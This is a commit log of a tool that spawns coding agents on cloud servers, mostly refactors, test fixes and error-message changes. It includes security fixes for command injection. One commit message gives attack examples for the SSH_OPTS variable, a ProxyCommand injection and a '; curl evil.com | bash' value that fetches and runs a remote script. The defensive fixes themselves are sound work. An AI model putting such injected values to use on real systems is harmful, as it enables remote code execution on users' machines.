Commit graph

1092 commits

Author SHA1 Message Date
A
8e55123e43
test: improve test coverage for provider delegation patterns (#1135)
* test: fix codesandbox provider pattern tests for helper function indirection

Update tests to account for functions that delegate to SDK helpers
(_csb_sdk_eval and _csb_run_cmd) rather than directly inlining SDK code.
Also add aliyun CLI auth pattern to credential handling test.

- Fix codesandbox tests to check for helper calls when patterns aren't direct
- Update test_codesandbox_token test to accept "How to fix" variant
- Allow interactive_session validation to check via run_server delegation
- Fixed: 42 codesandbox failures reduced to 0, 1 alibabacloud failure fixed

Agent: test-engineer

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* test: fix alibabacloud provider pattern tests for delegation

Update tests to account for alibabacloud delegating to shared SSH functions
instead of implementing SSH/SCP directly. Also adjust validation expectations
to match actual implementation which uses _aliyun_validate_create_params.

- Accept _aliyun_validate_create_params as validation pattern
- Update SSH test expectations for ssh_run_server and ssh_interactive_session
- Fixed: 6 alibabacloud failures reduced to 0

Agent: test-engineer

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* test: fix new-cloud-provider-patterns codesandbox validation tests

Update tests to account for codesandbox delegating to _csb_run_cmd helper
and interactive_session delegating to run_server.

- Accept _csb_run_cmd as SDK execution pattern
- Allow interactive_session validation via run_server delegation
- Fixed: 2 codesandbox validation failures reduced to 0

Agent: test-engineer

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 17:48:18 -05:00
A
22cdd75f80
ux: improve error message clarity and formatting (#1133)
Enhance user-facing error messages with better structure and visual hierarchy:

**CLI Error Messages:**
- Add bold headers for "Next steps:" and "Possible causes:" sections
- Make action items more scannable and directive
- Simplify language (e.g., "temporarily" vs "temporarily unavailable")
- Reduce redundancy in network error messages

**Shell Error Messages:**
- Add color-coded section headers (yellow for "Common causes" and "Next steps")
- Apply syntax highlighting to commands with CYAN color
- Improve readability of multi-step installation instructions
- Use bullet points (•) instead of dashes for better visual scanning
- Add inline comments to commands (e.g., "# Check disk space")

**Impact:**
Users experiencing errors will:
- Find actionable steps faster with clear visual hierarchy
- Copy-paste commands more easily with syntax highlighting
- Understand root causes quicker with color-coded sections
- Have a better experience during failure scenarios

All changes maintain backward compatibility and work across bash 3.x (macOS) and modern bash.

Agent: ux-engineer

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 17:44:47 -05:00
A
21b8f612e5
fix: enforce strict dedup rules to prevent duplicate agent comments (#1134)
Agents were posting redundant comments on issues because dedup checks
were soft prompt instructions that agents didn't reliably follow.
Strengthens all three team prompts with explicit STRICT DEDUP rules:

- security/issue-checker: skip issues entirely if already commented,
  do label fixes silently without commenting
- refactor/community-coordinator: only re-comment to link a new PR or
  report a concrete resolution, remove interim update instructions
- refactor/issue-fixer: check for ANY team's sign-off before posting
  acknowledgment, not just own team
- discovery/issue-responder: skip if already commented unless linking
  a concrete PR or fix

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-14 17:43:38 -05:00
A
7609cf2d6f
refactor: reduce complexity in OAuth and Hetzner validation functions (#1132)
Extract helper functions to simplify complex control flow:
- try_oauth_flow: Extract _start_oauth_session_with_server helper to handle server startup phase, improving readability and testability
- _hetzner_resolve_server_type: Extract _hetzner_log_validation_error and _hetzner_log_type_change helpers to separate error handling logic from main flow

These changes reduce nesting levels and improve function cohesion while maintaining identical behavior.

Agent: complexity-hunter

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 17:43:05 -05:00
A
aaa886a7a9
test: fix failing test assertions to match actual implementation (#1130)
Updated test assertions to reflect refactored helper functions and changed
error messages. Key changes:

- Fixed atlanticnet security tests to verify ensure_multi_credentials
  delegation instead of checking implementation details in provider code
- Updated shared-common-decomposed-helpers tests to check actual error output
  messages instead of outdated wording
- Fixed shared-github-auth test mocking to properly override command
  builtin for platform detection
- Updated CloudSigma manifest auth field to explicitly mention HTTP Basic Auth

Tests now pass with 517/517 success across affected test files.

Agent: test-engineer

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 14:14:33 -08:00
A
d589b0d74e
fix: tilde expansion in upload_config_file + bump refactor frequency (#1131)
Fix #1114 — `mv` failed because `~/.claude/settings.json` was
single-quoted on the remote shell, preventing tilde expansion.
Remove the single quotes around remote_path and add a mkdir -p
safety net.

Also bump the refactor team cron from hourly to every 5 minutes.

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-14 17:08:36 -05:00
A
11eff028a1
refactor: reduce complexity in shared/common.sh and test/mock.sh (#1128)
Extract pattern-matching logic in _strip_api_base() into separate helper functions (_strip_gcore_endpoint, _strip_scaleway_endpoint) to reduce function complexity from 36 lines to organized cases with extracted handlers.

Refactor ensure_api_token_with_provider() in shared/common.sh by extracting:
- _prompt_for_api_token() handles user prompting
- _validate_env_var_name() handles security validation
Reduces main function complexity and improves testability.

Agent: complexity-hunter

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 16:24:41 -05:00
A
f871996a82
ux: create parent directories before moving config files (#1127)
Fixes #1125 and #1114

The upload_config_file() function now creates parent directories
before moving config files to paths like ~/.claude/settings.json
and ~/.openclaw/openclaw.json.

Previously, if these directories didn't exist, the mv command would
fail with "No such file or directory" errors. This affected all
agents using setup_claude_code_config() and setup_openclaw_config().

Changes:
- Extract directory path using dirname
- Create parent directories with mkdir -p
- Execute chmod and mv in same command chain

Agent: ux-engineer

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 16:10:17 -05:00
A
b0843f6144
test: fix error message assertions in 7 test files (#1124)
Fixed 24 failing test assertions by aligning test expectations with actual error message output from the codebase:
- Updated error message strings to match actual implementation (e.g., "What to do" instead of "How to fix")
- Fixed case sensitivity issues ("Report it" vs "report it", "Server is still booting" vs "may still be booting")
- Adjusted assertions to match specific error paths (Network timeout vs Connection refused)
- All 284 tests in these 7 files now pass

Files fixed:
- cli-entry-edge-cases.test.ts: 56 tests
- cmdrun-happy-path.test.ts: 27 tests
- commands-swap-resolve.test.ts: 23 tests
- commands-update-download.test.ts: 17 tests
- download-and-failure.test.ts: 42 tests
- shared-common-ssh-helpers.test.ts: 52 tests
- shared-common-untested-helpers.test.ts: 67 tests

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 15:49:12 -05:00
A
c6d42e6f07
refactor: reduce complexity in discovery.sh, record.sh, and common.sh (#1123)
Break down overly complex functions into smaller, single-purpose helpers:

discovery.sh:
  - Extract _sync_and_setup() from run_team_cycle() for git sync + setup
  - Extract _launch_claude() to handle process startup
  - Extract _session_completed() to check session status
  - Extract _cleanup_cycle_files() for file cleanup
  - Reduces run_team_cycle() from 71 lines to 39 lines

record.sh:
  - Extract _validate_response_not_empty() for empty check
  - Extract _validate_response_json() for JSON validation
  - Extract _validate_response_no_error() for API error checking
  - Extract _record_fixture_metadata() for metadata recording
  - Reduces _save_live_fixture() from 34 lines to 15 lines

shared/common.sh:
  - Extract _check_agent_in_path() for PATH verification
  - Extract _check_agent_runs() for execution verification
  - Reduces verify_agent_installed() from 32 lines to 11 lines

Each helper is focused on one concern, improving maintainability and testability.

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 15:44:05 -05:00
A
8f4f091988
ux: improve auth error messages with provider URLs (#1122)
Agent: ux-engineer

Enhance error messages when authentication fails by including direct
URLs to the provider's API token page in the remediation steps.

Changes:
- Updated _validate_token_with_provider() to accept help_url parameter
- Updated _validate_multi_credentials() to include help_url in errors
- Modified ensure_api_token_with_provider() to pass help_url to validator

Users now see the provider dashboard URL immediately when auth fails,
reducing friction and eliminating the need to search for token pages.

Before:
  1. Re-run the command to enter a new token
  2. Or set it directly: HCLOUD_TOKEN=your-token spawn ...

After:
  1. Get a new token from: https://console.hetzner.cloud/projects
  2. Re-run the command and paste the new token
  3. Or set it directly: HCLOUD_TOKEN=your-token spawn ...

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 15:09:31 -05:00
A
5e3060616c
refactor: reduce complexity in test/mock.sh and discovery.sh (#1119)
Extract 60+ line nested case statement in _validate_body() into
dedicated _get_required_fields() function using cloud:endpoint pattern
matching. Reduces _validate_body() from 93 to 35 lines while improving
readability and maintainability.

Extract 162-line heredoc from build_team_prompt() into external
discovery-team-prompt.txt template file. Reduces function to 6 lines,
making discovery.sh more maintainable.

All 80 bash tests pass. No functionality change.

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
2026-02-14 14:11:36 -05:00
A
5b66b6e979
test: add _strip_api_base() and _validate_body() functions to test/mock.sh (#1118)
Adds missing test infrastructure functions that were previously only in
mock-curl-script.sh but required by test-infra-sync.test.ts:
- _strip_api_base(): Strips cloud provider API base URLs to extract endpoint paths
- _validate_body(): Validates POST request bodies contain required fields for major clouds

Fixes test failures in test-infra-sync.test.ts where coverage validation checks
rely on these functions being present in test/mock.sh.

Agent: test-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 13:24:18 -05:00
A
43e3de9da4
security: prevent command injection in SSH functions (#1115)
Fixed command injection vulnerability in ssh_run_server() and
ssh_interactive_session() by adding double-dash (--) argument separator.

Without the -- separator, SSH_OPTS could be exploited if an attacker
can control SSH_OPTS environment variable to inject additional SSH
arguments like "-o ProxyCommand=..." which would execute arbitrary
commands.

The -- separator ensures all subsequent arguments are treated as the
remote command, not SSH options.

Severity: CRITICAL
Impact: Remote command execution if SSH_OPTS is attacker-controlled

Agent: security-auditor

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 13:22:01 -05:00
A
f666b40977
ux: prioritize ready clouds in "not yet implemented" errors (#1117)
When a user tries to spawn an agent on an unimplemented cloud, the error
message now shows alternative clouds sorted by credential availability.
Clouds where credentials are already set are shown first and marked
with "(ready)" to make it obvious which options require no setup.

Before:
  Claude Code is available on 8 clouds. Try one of these instead:
    spawn claude hetzner
    spawn claude digitalocean
    spawn claude sprite

After:
  Claude Code is available on 8 clouds. Try one of these instead:
    spawn claude sprite (ready)
    spawn claude hetzner
    spawn claude digitalocean
  ready = credentials already set

This reduces friction by guiding users toward the path of least
resistance when their initial choice isn't available.

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 13:16:46 -05:00
A
7408c525c7
refactor: reduce complexity in test/mock.sh and test/record.sh (#1116)
Extracted ssh-keygen mock creation into _create_ssh_keygen_mock() to
simplify setup_mock_agents() from 38 to 13 lines.

Extracted validation and response handling in test/record.sh:
- _validate_endpoint_response(): handles empty/invalid/error responses
- _save_endpoint_fixture(): saves fixture and updates metadata
Reduces _record_endpoint() from 43 to 17 lines.

Extracted ID extraction and delete response handling:
- _extract_resource_id(): extracts ID from create response
- _handle_delete_response(): handles fallback for empty delete responses
Reduces _live_create_delete_cycle() from 44 to 28 lines.

All 79 tests pass.

Agent: complexity-hunter

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 13:11:42 -05:00
A
de42958eca
ux: fix install and upgrade success messages (#1113)
Fixes two UX issues identified in #1106:

1. Install script: Raw escape codes weren't rendering in log_info
   - Before: "Run \033[1mspawn\033[0m\033[0;32m to get started\033[0m"
   - After: Uses printf with proper color variable interpolation

2. Update command: Confusing message after `spawn update`
   - Before: "Run your spawn command again to use the new version"
   - After: "Run spawn again to use the new version"
   - The word "your" implied the user had run some other command,
     but they explicitly ran `spawn update`

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 12:45:36 -05:00
A
2f75c5b695
refactor: reduce complexity in test/mock.sh by extracting embedded script (#1112)
Extracted the large 270-line embedded mock curl script from the
setup_mock_curl() function into a separate file (mock-curl-script.sh).
This reduces setup_mock_curl() from 270 lines to 6 lines, improving
readability and maintainability.

The refactoring:
- Creates test/mock-curl-script.sh with all mock curl implementation
- Simplifies setup_mock_curl() to copy the external script
- Maintains identical functionality (all tests pass)
- Makes the mock curl logic easier to understand and modify

Agent: complexity-hunter

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 12:43:59 -05:00
A
42808ae101
security: prevent command injection via SSH_OPTS environment variable (#1111)
HIGH severity fix for command injection vulnerability.

The SSH_OPTS environment variable was used unquoted in multiple ssh/scp
commands throughout the codebase. While intentionally unquoted to allow
multiple options, this created a command injection risk if an attacker
could control the SSH_OPTS environment variable.

Attack vector:
  export SSH_OPTS="-o ProxyCommand='bash -c whoami'"; ./cloud/agent.sh
  export SSH_OPTS="; curl evil.com | bash #"; ./cloud/agent.sh

Impact: Remote code execution on the user's machine when running any
spawn script with a malicious SSH_OPTS value.

Fix: Added _validate_ssh_opts() function that blocks shell metacharacters
(; | & \` $ ( ) < >) in SSH_OPTS. If validation fails, secure defaults
are used instead.

Tested validation against:
- Semicolon injection (;)
- Pipe injection (|)
- Backtick injection (\`)
- Command substitution ($())
- Background execution (&)
- Redirection (< >)

Files changed:
- shared/common.sh: Added validation function and enforcement

Agent: security-auditor

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 12:43:32 -05:00
A
cce815836f
test: update assertions to match improved error messages (#1109)
The error messages were previously improved to be more user-friendly
and actionable (see PR #1103), but some tests were still checking for
the old error text. This commit updates test assertions to match the
new, clearer error messages.

Changes:
- Update security.test.ts assertions to check for new error message patterns
- Fix case-sensitivity issue in cli-version-and-dispatch.test.ts
- Update index-main-routing.test.ts to match new validation messages

The improved error messages now:
- Tell users WHAT went wrong
- Tell users HOW to fix it
- Provide concrete examples and next steps

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 11:49:20 -05:00
A
0d494d044e
test: add missing API assertion fixtures and body validation for 8 cloud providers (#1107)
Added _api_assertions.sh fixtures for binarylane, genesiscloud, hyperstack, kamatera, latitude, ovh, scaleway, and upcloud to enable comprehensive mock test coverage. Updated _validate_body() in test/mock.sh to validate POST request bodies for all cloud providers, ensuring payload correctness. Fixed syntax error in gcore validation (!! to ;;).

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
2026-02-14 11:46:49 -05:00
A
f8b2178658
ux: improve error messages for better clarity and actionability (#1103)
Enhance error messages throughout the codebase to provide clearer
explanations and more actionable guidance for users.

Changes:

Shell Scripts (shared/common.sh):
- Improve non-interactive mode error with better examples
- Expand model ID validation to show valid characters and examples
- Add detailed server name requirements with examples
- Fix diagnostic function to handle cases without fixes section

TypeScript CLI (cli/src/security.ts):
- Enhance identifier validation with bullet points and examples
- Add context about entity type (agent vs cloud) in errors
- Improve path traversal error with specific character explanations
- Better prompt validation messages with plain language guidance
- Improve overly-long identifier/prompt errors with helpful context

TypeScript CLI (cli/src/commands.ts):
- Rewrite download failure messages to be more user-friendly
- Change "Common causes" to "What's wrong" for clarity
- Change "How to fix" to "What to do" for better action orientation
- Add more specific troubleshooting steps for network issues
- Improve wording to be less technical and more helpful

Impact:
- Users get clearer, more actionable error messages
- Error messages now include examples of correct usage
- Reduced cognitive load by using plain language instead of jargon
- Better guidance for fixing issues without needing to consult docs

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 10:48:22 -05:00
A
0f3ca5e052
refactor: reduce complexity in test/mock.sh and test/record.sh (#1102)
Extracted helper functions to reduce cyclomatic complexity:

test/mock.sh:
- Extract _wait_with_timeout() from run_script_with_timeout() (reduced from 32→17 lines)
- Extract _setup_test_env() and _record_categorized_result() from run_test() (reduced from 50→26 lines)

test/record.sh:
- Refactor has_api_error() to use lambda dict for cloud-specific checks (improved readability, same logic)
- Extract _format_env_var_display() from list_clouds() to eliminate nested loop (reduced from 48→32 lines)

All functions maintain identical behavior and pass syntax validation.

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 10:43:19 -05:00
A
dacb65785a
test: fix assertions to match actual function behavior (#1104)
- generic_wait_for_instance: Fix IP address assertion by printing exported variable
- local agent scripts: Update test to check for log_install_failed function calls
- security encoding: Update error message assertion to match current validatePrompt output

These fixes align test assertions with the actual implementation behavior,
reducing test failures from 233 to 222.

Agent: test-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 10:42:56 -05:00
A
b2c8c87435
test: fix test assertions to match updated error messages (#1101)
Adjusts test expectations to handle recent UX improvements that changed
error message formatting. Also adds support for variable-based test
infrastructure detection in test-infra-sync.test.ts and includes missing
cloud URL patterns for webdock, serverspace, and gcore.

Agent: test-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 09:28:52 -05:00
A
5eeb4068c9
refactor: extract helper functions in discovery.sh and gcore/lib/common.sh (#1100)
- Extract watchdog monitoring logic from run_single_cycle() into _monitor_process() helper
- Extract gcore project loading, detection, and config saving into separate functions:
  - _load_gcore_project_from_config()
  - _auto_detect_gcore_project()
  - _save_gcore_project_to_config()
- Simplify ensure_gcore_project() by delegating to helper functions
- Reduces cyclomatic complexity and improves testability

Agent: complexity-hunter

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 09:23:30 -05:00
A
b1dac275dc
ux: improve service deployment error messages for Railway and Render (#1099)
Railway and Render had bare error messages ("Service deployment failed")
without actionable guidance, unlike Koyeb which provides detailed debugging
steps. This brings them up to parity with comprehensive error handling.

Changes:
- Railway: Add detailed causes and debugging steps for deployment failures
- Railway: Improve timeout message with actionable next steps
- Render: Add detailed causes and debugging steps for deployment failures
- Render: Enhance timeout message with clear remediation guidance

Both now provide:
- Common failure causes (build errors, resource limits, health checks)
- Numbered debugging steps with dashboard links
- Specific CLI commands for troubleshooting
- Clear retry instructions

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 09:23:19 -05:00
A
baa60f3bd4
ux: improve security and validation error messages (#1097)
Enhance error messages across validation and download failures to be more
actionable and user-friendly:

Security validation improvements (cli/src/security.ts):
- validateIdentifier: Add examples of valid names, clearer length error
- validateScriptContent: Improve empty script and shebang error messages
- validatePrompt: Better guidance on prompt requirements and length limits
- validatePromptFilePath: Clearer security warnings with concrete examples
- validatePromptFileStats: More helpful messages for file size/empty errors

Download failure improvements (cli/src/commands.ts):
- reportDownloadFailure: Add "Common causes" section, better 404 guidance
- reportDownloadError: Context-aware messages for timeout vs connection errors
- validateNonEmptyString: Minor wording improvement

All error messages now follow a consistent pattern:
1. What went wrong (clear, specific)
2. Why it might have happened (common causes)
3. How to fix it (numbered, actionable steps)

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 06:08:48 -08:00
A
6647f7ca05
refactor: reduce complexity in test/mock.sh and test/record.sh (#1096)
Extract assertion tracking and fixture detection logic in mock.sh:
- New _run_assertions_and_track() helper consolidates 20 lines of repeated assertions
- New _has_missing_fixture() helper checks mock log for fixture errors
- run_test() now 30 lines shorter, focusing on orchestration rather than details

Extract cloud endpoints data in record.sh:
- Replace 132-line case statement with data-driven approach
- Each cloud's endpoints now live in _ENDPOINTS_{cloud} variable
- get_endpoints() function reduced to 3 lines, delegates to variable lookup

Benefits:
- Reduced cognitive load: test logic separated from data
- Easier to add new clouds: just add _ENDPOINTS_* variable
- Better maintainability: centralized endpoint definitions

Tests: All 80 tests pass with fixtures enabled.

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 07:12:54 -05:00
A
8981376274
test: fix failing tests in agent-config-setup.test.ts (#1095)
Fix 15 failing tests by implementing proper mock_run callbacks that handle
path substitution for /tmp/spawn_config_* files and home directory paths.
Updated all failing test cases to use sed-based path replacement before
eval to correctly move configuration files to their final destinations.
All 40 tests in agent-config-setup.test.ts now pass.

Agent: test-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
2026-02-14 05:47:45 -05:00
A
3ef59261e7
refactor: reduce complexity in discovery.sh and gcore/lib/common.sh (#1094)
- Extract watchdog loop logic from run_team_cycle into _run_watchdog_loop helper
- Extract resource cleanup into _cleanup_stale_artifacts helper
- Extract prompt file preparation into _prepare_prompt_file helper
- Extract cycle completion handling into _handle_cycle_completion helper
- Extract claude process killing into _kill_claude_process helper (macOS bash 3.x compatible)
- In gcore/lib/common.sh: Extract resource gathering into _gather_instance_resources
- In gcore/lib/common.sh: Extract instance ID extraction into _extract_instance_id
- All refactoring maintains 100% test coverage (80/80 tests pass)

Agent: complexity-hunter

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 05:45:35 -05:00
A
205f835411
ux: improve security and validation error messages (#1090)
* ux: improve security and validation error messages

Make error messages more user-friendly and actionable:

**Security validation errors:**
- Changed "contains invalid characters" to "Invalid agent: ..." with clearer formatting
- Added context-specific guidance (spawn agents vs spawn clouds)
- Replaced technical jargon with plain language
- Changed "path traversal characters" to list specific disallowed characters

**Prompt validation errors:**
- Replaced "Prompt blocked: contains potentially dangerous pattern" with
  "Your prompt contains shell syntax that can't be safely processed"
- Added specific suggestions for each pattern (e.g., 'Instead of "Fix $(ls)",
  try "Fix the output of ls command"')
- Included helpful tip about using plain English instead of shell syntax

**Script download errors:**
- Replaced technical "must start with a valid shebang" message with bullet-point
  explanation of what went wrong
- Added step-by-step "How to fix" section
- More user-friendly language throughout

**Prompt file errors:**
- Changed "Refusing to read" to "Cannot use... as a prompt file"
- Added clear "How to fix" with example commands
- Better explanation of why certain paths are blocked

All error messages now:
- Start with what went wrong in plain language
- Explain why it happened
- Provide specific next steps to fix it
- Use consistent formatting with bullet points and sections

Agent: ux-engineer

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: Replace !! with ;; in gcore case branches in record.sh

Addresses security review feedback. The !! syntax is invalid bash and broke
the test recording infrastructure.

-- refactor/pr-maintainer

---------

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 05:13:35 -05:00
A
dc85015979
fix: Add timeout protection to QA cycle mock test phases (#1088)
* fix: Properly handle comma-separated auth vars in key-request.sh

The tr command was incorrectly translating each character in '+,' to newline,
causing "ALIYUN_ACCESS_KEY_ID, ALIYUN_ACCESS_KEY_SECRET" to not be split properly.

Also updated get_cloud_env_vars to split on both + and , separators.

Fixes the error: "ALIYUN_ACCESS_KEY_ID, ALIYUN_ACCESS_KEY_SECRET: invalid variable name"

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: Add timeout protection to QA cycle mock test phases

Prevents the QA cycle from hanging indefinitely if test/mock.sh hangs.
Wraps both Phase 2 and Phase 4 mock test runs with a 10-minute timeout.

Context: QA bot hung for 1+ hour when test/mock.sh hung in Phase 2,
causing the trigger server to become unresponsive. This adds defensive
timeouts to prevent cascade failures.

Agent: qa-timeout-fixer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: Address macOS compat and exit code capture issues

Fixes from security review:
- qa-cycle.sh:858-863 - Use MOCK_EXIT=0 pattern like Phase 2 (local outside function is invalid)
- key-request.sh:94 - Revert to tr for macOS BSD sed compatibility

-- refactor/pr-maintainer

---------

Co-authored-by: Spawn QA Bot <qa-bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
2026-02-14 05:10:25 -05:00
A
0bb085214a
fix: Properly handle comma-separated auth vars in key-request.sh (#1083)
* fix: Properly handle comma-separated auth vars in key-request.sh

The tr command was incorrectly translating each character in '+,' to newline,
causing "ALIYUN_ACCESS_KEY_ID, ALIYUN_ACCESS_KEY_SECRET" to not be split properly.

Also updated get_cloud_env_vars to split on both + and , separators.

Fixes the error: "ALIYUN_ACCESS_KEY_ID, ALIYUN_ACCESS_KEY_SECRET: invalid variable name"

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: Revert sed to tr for macOS bash 3.x compatibility

As requested in security review - BSD sed treats \n in replacement
as literal backslash-n, not newline. tr already handles both + and ,
delimiters correctly on all platforms.

Addresses security review feedback.

---------

Co-authored-by: Spawn QA Bot <qa-bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
2026-02-14 05:10:11 -05:00
A
4d67d08487
ux: improve service deployment error messages for Koyeb and Northflank (#1093)
Enhanced error messages when service deployment fails or times out on Koyeb
and Northflank providers to give users more actionable debugging information.

Changes:
- Koyeb: Added specific debugging steps including CLI command and region/instance type suggestions
- Koyeb: Clarified "status" in error message to show exact failure status
- Koyeb: Added "Application error in startup command" as a common cause
- Northflank: Added last known status to timeout error message
- Northflank: Restructured error to show "Possible causes" and "Debugging steps" sections
- Northflank: Clarified that service might still be starting to prevent premature retries

These improvements help users quickly identify and resolve deployment issues
without needing to escalate to support.

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 05:10:07 -05:00
A
9d14ef4a19
refactor: reduce complexity in shared/common.sh by extracting helper functions (#1091)
- Extract _log_ssh_wait_progress() from generic_ssh_wait() to reduce nesting
- Extract _log_ssh_wait_timeout_error() to consolidate error handling and troubleshooting output
- Extract _generate_openclaw_json() from setup_openclaw_config() to reduce inline JSON generation complexity
- All helpers are private (prefixed with _) and encapsulate related logic

These refactorings reduce function complexity:
- generic_ssh_wait: 68 lines → 47 lines (31% reduction)
- setup_openclaw_config: 41 lines → 28 lines (32% reduction)

Test results: bash test/run.sh passes (80/80), bun test unaffected by these changes

Agent: complexity-hunter

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 04:15:27 -05:00
Ahmed Abushagur
27825c6f3c
fix: replace !! with ;; in gcore case branches in record.sh (#1089)
The Gcore PR (#1079) introduced `!!` instead of `;;` as case statement
terminators in 4 places, causing a syntax error on line 542 that breaks
all fixture recording.

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-14 04:15:09 -05:00
A
a67f8dd837
test: Fix manifest consistency and improve test assertions (#1087)
- Fix manifest.json matrix entries: change local/opencode and hostkey/open-interpreter from 'implemented' to 'missing' (scripts don't exist)
- Rename agent entries in matrix to match actual agent keys (codex-cli→codex, gemini-cli→gemini, kilo→kilocode, open-interpreter→interpreter)
- Update test assertions to match actual output formats (e.g., 'Extra argument ignored' instead of 'extra argument')
- Fix shared-common-error-polling tests to check stderr output correctly
- Simplify agent-config-setup tests to work within shell context limitations
- Remove outdated install.sh test that expected non-existent 'WRAPPER' string
- Ensure CLI dependencies are installed before test runs

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 01:10:03 -08:00
A
42b4dfc42e
refactor: reduce complexity in command functions (#1085)
Extract large switch statement in getScriptFailureGuidance() into lookup tables
and helpers for better maintainability. Break down renderCompactList() into
separate helper functions for header, separator, and row rendering.

This reduces cognitive complexity and makes the functions easier to test and modify.

Agent: complexity-hunter

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 04:02:53 -05:00
A
f3ee7e271a
security: Fix command injection vulnerability in env var exports (#1086)
CRITICAL: Add validation to prevent command injection via malicious environment variable names in `export "${var_name}=..."` patterns.

Vulnerability Details:
- All instances of `export "${var_name}=${value}"` where var_name is derived from external sources (manifest.json auth fields, user input, API responses) were vulnerable to command injection
- If var_name contained shell metacharacters like `;`, `$()`, or backticks, arbitrary code could be executed
